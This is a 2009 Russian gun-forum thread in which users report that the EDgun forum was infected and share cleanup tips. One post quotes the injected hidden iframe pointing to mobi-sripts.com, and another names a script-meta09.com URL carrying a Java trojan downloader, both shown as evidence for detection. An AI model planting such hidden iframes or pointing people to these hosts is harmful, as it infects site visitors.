Guns.ru Talks
  EDgun
  Вирус! ( 1 )

вход | зарегистрироваться | поиск | реклама | картинки | кто здесь | ссылки | календарь | поиск оружия, магазинов | фотоконкурсы | Аукцион
  всего страниц: 3 :  1  2  3 
  следующая тема | предыдущая тема
Автор Тема:   Вирус!    (просмотров: 2604)
 версия для печати
Evgeniy R
posted 27-11-2009 12:53    
На сайте Эдган точнее на форуме есть вирусяга!!! Так что у кого нет файрвола можите прилипнуть.

edit log

никитос
posted 27-11-2009 13:29    
Только что оттуда. Аваст молчит.
Gin.ru
posted 27-11-2009 14:02    
Есть такое дело. Висит скрытый фрейм. Браузер ломится на script-meta09.com и качает оттуда пакость. Фу-ууу админам эганского форума...
Gin.ru
posted 27-11-2009 14:04    
quote:
Originally posted by никитос:

Аваст молчит.


У меня KIS орёт, что идёт обращение к -http://script-meta09.com/index/aHere.class, который содержит Trojan-Downloader.Java.Agent.ab

edit log

Эдуард
posted 27-11-2009 15:38    
Все пофиксено еще вчера было.
Gin.ru
posted 27-11-2009 17:59    
Значит после этого опять инфицировали форум
Fake
posted 27-11-2009 19:48    
Вот, похоже, из-за этого я вчера и занимался форматированием всех своих винтов на компе. Подцепил такую срань, что ни в сказке сказать, ни пером описать. Пля.
mavic
posted 28-11-2009 00:50    
Почистили уже? а то у меня лицензия на антивирь кончилась.
Gin.ru
posted 28-11-2009 01:55    
quote:
Originally posted by mavic:

Почистили уже?



нет. Легко убедиться
Откройте исходный текст центральной страницы форума (в IE меню "Вид"-> Просмотр HTML-кода). Если на предпоследней строке увидите что-то типа

quote:
<iframe rsqdf='QmW7cFUR' src='http://mobi-sripts.com/s/in.cgi?6 ' ulmnu='JjfHev5B' width='0' height='0' стиль='display:none'></iframe>

значит пакость там. На момент, когда пишу эти строки - так и есть :<

Эйнштейн
posted 28-11-2009 16:07    
Протестил без фаервола, аваст поругался на один троян и один адэвэйр, но пропустил ещё два трояна.. Эти падлы заблокировали инет (через фаервол, кстати) и модифицировали некоторые драйвера от явы и звука. Лечится КьюрИтом из под АВЗгварда нормально, Но потом этим же авз надо проверить все библиотеки и дрова на подозрительные.
Fake
posted 28-11-2009 18:02    
Я словил какую-то гадость, которая вывесила поверх всех окон порнуху, которую назвала рекламной заставкой и предложила отправить СМС на номер 3649.
Заблокировала прописанный антивирус (Avira Anrivir), прописанную Оперу (ИЕ работал), квип.
Так же, заблокировала доступ к Диспетчеру файлов (ни три кнопки, ни вызов через коммандную строку не работали). Запущенные с флешки проги для просмотра запущенных процессов отрубались на лету (закрывались после открытия), запущенный с флешки антивирус успел только частично проверить комп, потом перезагрузка. Безопасный режим просто не грузится. Попытался прогрузится с сидюка с ДрВебом под линухом, не получилось. Толи руки кривы, толи еще что. Погоревал, погоревал и форматнул оба харда нахрен.
Раньше подобную хрень видел как надстройку к браузеру, а тут она самостоятельная стала. Работает независимо от всего.
Уррроды...
Эйнштейн
posted 28-11-2009 23:38    
Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..
Fake
posted 29-11-2009 00:00    
quote:
Originally posted by Эйнштейн:
Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..

Вот как раз AVZ оно и отлупляло но половине работы.

Эйнштейн
posted 29-11-2009 00:13    
Если включать AVZguard, то ничего вирус возразить уже не сможет
Fake
posted 29-11-2009 00:24    
quote:
Originally posted by Эйнштейн:

Если включать AVZguard, то ничего вирус возразить уже не сможет



А как его подключить? У меня эта закладка не активна. Скачал другую версию AVZ, та же история.

PS Вопрос отпал. Под ХР все работает.

edit log

Эйнштейн
posted 29-11-2009 00:35    
хз, версия 4.32, всё активно. Потом нужно выбрать второй пункт этого меню и оттуда запустить cureit
701 x 227
Fake
posted 29-11-2009 00:41    
Я его воткнул на старый ноут с МЕ. Под МЕ эти две закладки не активны.
Эйнштейн
posted 29-11-2009 00:52    
ну дык хр и милениум слишком разные просто, там другая версия проги требуется
unnamed13
posted 29-11-2009 11:32    
А на какие браузеры эта дрянь садиццо? Я вчера заходил с w7 через ff3.5.5 - не заметил ничего необычного. Из плагинов у меня только adblock+. За ie8 + smartscreen не скажу, но вроде чисто.

За линукс с ff/opera/chrome я спокоен, винда на еее живет второй ос. Отпишитесь кто чем поймал.

Fake
posted 29-11-2009 13:41    
У меня она сидела не на браузере. Включил комп, кликнул на антивирус и тут тебе окно на 2/3 экрана с порнухой и предлжением отправить СМС.

ЗЫ Винда ХР, Опера 10, Avira Antivir

  всего страниц: 3 :  1  2  3 

новая тема  Post A Reply
следующая тема | предыдущая тема

  Guns.ru Talks
  EDgun
  Вирус! ( 1 )
guns.ru home